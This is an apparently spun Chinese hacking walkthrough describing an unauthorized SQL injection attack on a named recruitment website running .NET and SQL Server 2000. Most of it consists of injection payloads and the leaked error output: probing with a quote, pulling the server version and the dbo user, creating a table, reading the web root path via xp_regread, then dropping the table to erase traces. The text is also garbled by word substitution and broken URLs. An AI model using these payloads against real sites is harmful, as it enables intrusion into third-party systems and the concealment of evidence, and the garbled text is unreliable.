今天上了一个人才招聘网站,对他们的应聘体系我很感兴致,aspx结尾的,看来是.net的程序,这样的网站会不会有什么破绽呢·顺便翻开一条新闻 www.cnwill./NewsShow.aspxid4847 ,然后加一个' 看看呈现什么·我晕。。Source: .Net SqlClient Data ProviderDescription: 字符串 '' 之前有未闭合的引,。TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.mandBehavior, System.Data.SqlClient.RunBehavior, Boolean) 仿佛有可能,而后 11 畸形 12犯错。。这和asp的好像不区别阿。。于是把NBSI挂上了,居然也能够猜出表名来,和ASP没差别。不外NBSI不意识这里的出错信息,只能按照没有提示的方法破。。先暂停一下NBSI,输入www.cnwill./NewsShow.aspxid484420and200 ; (select20version)提示:Source: .Net SqlClient Data ProviderDescription: 将 nvarchar 值 'Microsoft SQL Server 2000 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 19882003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时产生语法过错。TargeSite: Boolean Read() 是个2000的Enterprise server而且SP4了。。然后_name" www.cnwill./NewsShow.aspxid484420and200 ; user_name()提示:Source: .Net SqlClient Data ProviderDescription: 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法毛病。TargeSite: Boolean Read() 哦·用dbo的身份衔接·应当有搞头。。首先依照破解ASP网站的方式,要他的相对路径用以下,第一步树立一个表:www.cnwill./NewsShow.aspxid4844;create20table20.dbo...cyfd.(.gyfd..char.(255))把web门路写进去www.cnwill./NewsShow.aspxid4844;DECLARE result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,result output insert into cyfd (gyfd) values(result); 仍是让他不匹配,显示错误www.cnwill./NewsShow.aspxid4844 and 1(select count(.) from cyfd where gyfd 1) 得到提醒:Source: .Net SqlClient Data ProviderDescription: 将 varchar 值 'Y:\Web\烟台人才热线后盾治理系统,,201 ' 转换为数据类型为 int 的列时发生语法错误。TargeSite: Boolean Read() 哈哈哈。。路径裸露了。。接下来删除痕迹www.cnwill./NewsShow.aspxid4844;drop20table20cyfd;后边该怎么做就未几说了。。跟袭击ASP的网站一样。。